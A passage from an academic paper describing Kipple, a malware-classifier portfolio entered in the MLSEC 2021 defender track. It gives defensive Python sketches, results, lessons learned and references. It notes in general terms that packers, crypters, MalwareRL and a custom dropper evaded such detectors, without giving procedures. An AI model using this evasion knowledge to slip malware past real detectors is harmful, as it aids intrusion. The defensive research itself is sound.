That said, there are some differences: even in the size three portfolio set, the msf cases (rows 13 through 16) are not as strong as the undetect cases (rows 17 through 20). Within the latter set, two options stick out as the strongest. First, against the adversarial samples, {Base, variants-all, undetect-all} would appear the strongest, performing best on the 2019 and MalwareRL data sets, and within a small distance of the best score for the SecML Malware data set. More well-rounded, however, is the {Base, variants-benign, undetect-all} portfolio. This option performs better by a few percentage points on the normal EMBER and MLSEC sets and is still the second-highest scorer for the adversarial samples.

6 MLSEC 2021 Performance

In this section we discuss Kipple's performance in the MLSEC 2021 event, covering what the final submission looked like and taking a critical look at its performance.

6.1 Submission

We ultimately entered "Kipple" into the 2021 MLSEC competition using the {Base, variants-all, undetect-benign} configuration; this decision was made somewhat arbitrarily and was due to some miscalculations on performance before submission. Additionally, we made several changes to make the model more performant.

First, in local testing, we realized that Kipple struggled to correctly classify some benign binaries; specifically, local binaries similar to the ones used to build it. To hedge against this, we first raised the threshold of the undetect-benign model within the portfolio; this largely stopped it from misclassifying these files. Still, to make the approach even more effective, we hardcoded the specific MD5 values of the binaries it was trained on, bypassing the models entirely and returning "benign" if a submitted file matched one of those hashes.

Second, we leveraged the MLSEC-provided code14 implementing a "stateful" detection system as described by Chen et al. [5]. This model works by keeping a "history" of prior queries that were flagged as malware; when a new query is sent to the classifier, if it is identified as malicious, the classifier stores it and returns malicious. If it is instead identified as benign, it is compared to the history of prior malicious queries; if it is within a certain distance of an existing prior query, the classifier flags the submission as malicious. Our submission followed the default implementation, but differed in that it added a query to the history if and only if the variants-all model flagged it as malicious, ignoring whether the submission was flagged by Base or undetect-benign. While including the other models would likely have been more accurate, we did not have adequate time to test this approach and did not want to increase our false positive rate.

14 https://github.com/Azure/2021-machine-learning-security-evasion-competition/blob/main/defender/defender/models/ember_model.py#L114
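Putting these pieces together, the sketch below outlines the submission-time decision flow: the hardcoded MD5 allow-list, the OR-vote across the three models, and a simplified stand-in for the stateful history check (the MLSEC-provided implementation uses its own feature transformation and distance metric). The model objects, thresholds, feature extractor, and distance cutoff are all placeholders.

    import hashlib
    import numpy as np

    HISTORY = []              # feature vectors of queries flagged by variants-all
    HISTORY_DISTANCE = 10.0   # illustrative distance cutoff

    def classify(file_bytes, base, variants_all, undetect_benign,
                 thresholds, extractor, known_benign_md5):
        # 1. Hardcoded allow-list: skip the models entirely for known local benign files.
        if hashlib.md5(file_bytes).hexdigest() in known_benign_md5:
            return "benign"

        features = np.asarray(extractor.feature_vector(file_bytes))

        # 2. OR-vote across the portfolio (each model returns a scalar score here).
        flagged_by_variants = variants_all.predict(features) >= thresholds["variants-all"]
        malicious = (base.predict(features) >= thresholds["base"]
                     or flagged_by_variants
                     or undetect_benign.predict(features) >= thresholds["undetect-benign"])

        # 3. Stateful check: a benign-scored query close to a prior malicious
        #    query is treated as a probing/evasion attempt.
        if not malicious and HISTORY:
            if min(np.linalg.norm(features - h) for h in HISTORY) < HISTORY_DISTANCE:
                malicious = True

        # Only queries flagged by variants-all are added to the history.
        if flagged_by_variants:
            HISTORY.append(features)

        return "malicious" if malicious else "benign"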
6.2 Results

Kipple ultimately took third in the defender track, with a score of 231 bypasses; the winner [9] had 162 bypasses, second place [14] had 193, and fourth, fifth, and sixth place had 714, 734, and 1840 respectively.

While this was an overall strong performance, Kipple did have several shortcomings. First, looking at the results in Table 6, Kipple is not perfect: it still misses a good portion of the MalwareRL and SecML Malware attacks. Indeed, during the competition the authors inadvertently evaded Kipple by using MalwareRL during the attacker track.

Second, and perhaps more importantly, Kipple has very little knowledge of traditional malware obfuscation techniques. In self-testing, the authors found that many off-the-shelf packers and crypters were able to sufficiently obfuscate the MLSEC samples to bypass Kipple's detection. While some of these approaches were somewhat novel, many of them were simple open-source scripts and easy to run. In fact, the winners of the attacker track [9] – who also won the defender track – recognized this, and were able to score the most evasions using a custom dropper they developed, sans any specific adversarial ML techniques (though some of their action space did overlap with the techniques in MalwareRL).

7 Lessons Learned

As a smaller side effort, we encountered and overcame many barriers in developing Kipple that those less familiar with the field would likely also run into. As part of our goal to enrich the research community, we report on several of these roadblocks, how we overcame them, and tips for others looking to conduct similar research. While many of these may seem obvious at first glance, for those just getting their feet wet these lessons may not be immediately intuitive.

7.1 Space Requirements

Kipple was initially intended to be built on a small (<30GB) Linux virtual machine run on a personal computer. This quickly became problematic – between the large size of EMBER, the massive size of SoReL, the needed Python and other libraries, and the space required to save newly generated variants, 30GB quickly became too small. While we ultimately increased the space allotted to the VM developing Kipple, some of the early decisions influenced the course of the project; and even once the VM's space was enlarged, we still found ourselves running out of storage. Ultimately Kipple was allocated roughly 300GB of space, which appears sufficient for most operations.

Recommendation. We recommend researchers start with at least 200GB of space if possible when conducting adversarial malware research, with more preferred. Additionally, using VMs in a cloud environment will likely make storage less of a problem than local hardware.

7.2 Time Allocation

Time played a key role in the development of Kipple: many of the ideas of the project were straightforward, but were hard to test due to the needed computation time and other difficulties. Indeed, many issues compounded as we intended to deliver Kipple as part of the 2021 MLSEC event, which had a strict submission deadline.
Some example issues include:

• Long-running code or scripts that failed near the end due to typos or mistakes;
• Long computation times for building new classifiers and models;
• Needing more time to construct adversarial examples; and
• Rate limiting for downloading malware samples.

Ultimately we tried to mitigate these as best we could, but many of the experiments we ran for Kipple needed to be configured late in the evening and run overnight, with some days lost due to typos or other issues.

Recommendation. Understand that adversarial malware research may be time intensive. Attempt to parallelize your work and research whenever possible, and strongly consider using cloud infrastructure if you can. Set up pipelines to run consecutive jobs so the code can run unattended. Review your code for bugs before running, and consider letting your long jobs run for a few minutes before stepping away.

One other recommendation to help save on time is to avoid duplicative computation. As an example, when training a new model, we would always convert each adversarial sample into its feature vector during training, requiring a significant amount of time once we had generated many samples and had multiple models to test. Eventually we developed a storage system where, upon generation, we would store the feature vector for a new adversarial sample, thereby bypassing the need to convert the sample for each of the models we wanted to train. This approach itself was time consuming to implement, but saved many hours of computation time further down the road.

7.3 Record Keeping

We tried many different implementations for Kipple, ranging from choosing different LGBM parameters to training on different data sets. Unfortunately, we ran into issues keeping records of some of our models, parameters, and other training information. This ended up slightly hurting our efforts, as in some cases we did not have exact information regarding a model we had built a week before, or we needed to reproduce something due to a small code mix-up. Much of this was the result of fighting time and storage issues, where we would implement something quickly without following good practices; in these cases, even when the outcome was positive, we still had to invest more time figuring out how to fix our implementation than if we had done it correctly the first time.

Recommendation. Good coding practices help: use version control when possible, label variables well in your code, and give all files, models, and other artifacts descriptive names. Keep track of all important information, and back up often.

7.4 Data Robustness

Perhaps the most surprising result from our experiments was the accuracy of each model on the test data sets we created for the adversarial samples. This initially came as a shock, seemingly indicating that the models were extremely effective – however, we ultimately realized that the accuracy came as a result of training/testing overlap, where variants of individual samples wound up in both the training and testing sets, thereby allowing the classifier to "see" example test data while training.

Recommendation. Identify training and test sets early, and try to identify any overlap between the two early in the process. Make sure to include at least one data set that appears disjoint from the training data.
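One lightweight way to enforce this is to split by originating sample rather than by individual variant, so that all variants derived from a given original binary land entirely in the training set or entirely in the test set. The sketch below assumes each variant has been tagged with the hash of the sample it was derived from; the names are placeholders.

    import random

    def split_by_original(variants, test_fraction=0.1, seed=0):
        """variants: list of (original_sha256, variant_path) pairs. All variants
        derived from the same original sample end up on the same side of the split."""
        originals = sorted({sha for sha, _ in variants})
        random.Random(seed).shuffle(originals)
        n_test = max(1, int(len(originals) * test_fraction))
        test_originals = set(originals[:n_test])

        train = [path for sha, path in variants if sha not in test_originals]
        test = [path for sha, path in variants if sha in test_originals]
        return train, test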
8 Discussion and Future Work

We close out this paper with a discussion of some of our major results, as well as identifying different areas for future work. One immediately noteworthy result was the high rate of evasion for the adversarial examples produced in Section 3. Even though these were produced to be evasive against MalConv – a classifier using a very different architecture – they were still effective against our GBDT classifier in Section 4. The transferability of adversarial examples is an interesting area of study, and we hope that these results can help inform future areas of research; anecdotally, we found that many of the samples produced locally also transferred to the other models as part of the MLSEC attacker challenge.

Another notable result from Kipple is the effectiveness of the portfolio classifier versus the adversarially retrained one. While the difference in performance is perhaps not terribly large, the portfolio did seem to do convincingly better on the MLSEC data set. The final Kipple model, while not bulletproof, was successful in stopping a large number of evasion attacks. We believe that a future approach could leverage more data and additional training modules to make the solution even more robust.

Finally, we note that one of our original hypotheses was that the existing benign and malicious data would be sufficiently different from our own generated adversarial samples to provide effective training data for building a new classifier. Interestingly, we found evidence both for and against this hypothesis: for the adversarial, variants, and msf models it was clear that benign outperformed all, but for the undetect model our hypothesis was indeed true and all outperformed benign. We believe that this, as well as the efficacy of training on strictly evasive samples, is an interesting area for further research.

9 Code Availability

As part of this project, we have released all of the code behind Kipple online: https://github.com/aapplebaum/kipple. This includes code to train and evaluate models, the adversarial variants we generated, and the models themselves. We hope that this release will help encourage future research in this area.

References

[1] H. S. Anderson and P. Roth. EMBER: An Open Dataset for Training Static PE Malware Machine Learning Models. ArXiv e-prints, Apr. 2018.
[2] H. S. Anderson, A. Kharkar, B. Filar, D. Evans, and P. Roth. Learning to evade static PE machine learning malware models via reinforcement learning. arXiv preprint arXiv:1801.08917, 2018.
[3] A. Applebaum. Trying to make meterpreter into an adversarial example. URL: https://www.camlis.org/2019/talks/applebaum, 2019.
[4] B. Filar. MalwareRL, 2021. URL: https://github.com/bfilar/malware_rl.
[5] S. Chen, N. Carlini, and D. Wagner. Stateful detection of black-box adversarial attacks. In Proceedings of the 1st ACM Workshop on Security and Privacy on Artificial Intelligence, pages 30–39, 2020.
[6] L. Demetrio and B. Biggio. secml-malware: A Python library for adversarial robustness evaluation of Windows malware classifiers, 2021.
[7] L. Demetrio, B. Biggio, G. Lagorio, F. Roli, and A. Armando. Explaining vulnerabilities of deep learning to adversarial malware binaries. In ITASEC19, volume 2315, 2019.
[8] L. Demetrio, B. Biggio, G. Lagorio, F. Roli, and A. Armando. Functionality-preserving black-box optimization of adversarial Windows malware. IEEE Transactions on Information Forensics and Security, 2021.
[9] F. Ceschin and M. Botacin. Adversarial Machine Learning, Malware Detection, and the 2021's MLSEC Competition, Sept. 2021.
[10] R. Harang and E. M. Rudd. SOREL-20M: A large scale benchmark dataset for malicious PE detection, 2020.
[11] W. Hu and Y. Tan. Black-box attacks against RNN based malware detection algorithms. In Workshops at the Thirty-Second AAAI Conference on Artificial Intelligence, 2018.
[12] B. Kolosnjaji, A. Demontis, B. Biggio, D. Maiorca, G. Giacinto, C. Eckert, and F. Roli. Adversarial malware binaries: Evading deep learning for malware detection in executables. In 2018 26th European Signal Processing Conference (EUSIPCO), pages 533–537. IEEE, 2018.
[13] H. Li, S. Zhou, W. Yuan, J. Li, and H. Leung. Adversarial-example attacks toward Android malware detection system. IEEE Systems Journal, 14(1):653–656, 2019.
[14] A. Mosquera. amsqr at MLSEC-2021: Thwarting Adversarial Malware Evasion with a Defense-in-Depth, Sept. 2021. URL: https://doi.org/10.5281/zenodo.5534783.
[15] N. Carlini. On evaluating adversarial robustness. URL: https://www.camlis.org/2019/keynotes/carlini, 2019.
[16] P. Roth. EMBER improvements. URL: https://www.camlis.org/2019/talks/roth, 2019.
[17] E. Raff, J. Barker, J. Sylvester, R. Brandon, B. Catanzaro, and C. K. Nicholas. Malware detection by eating a whole EXE. In Workshops at the Thirty-Second AAAI Conference on Artificial Intelligence, 2018.
[18] I. Rosenberg, S. Meir, J. Berrebi, I. Gordon, G. Sicard, and E. O. David. Generating end-to-end adversarial examples for malware classifiers using explainability. In 2020 International Joint Conference on Neural Networks (IJCNN), pages 1–10. IEEE, 2020.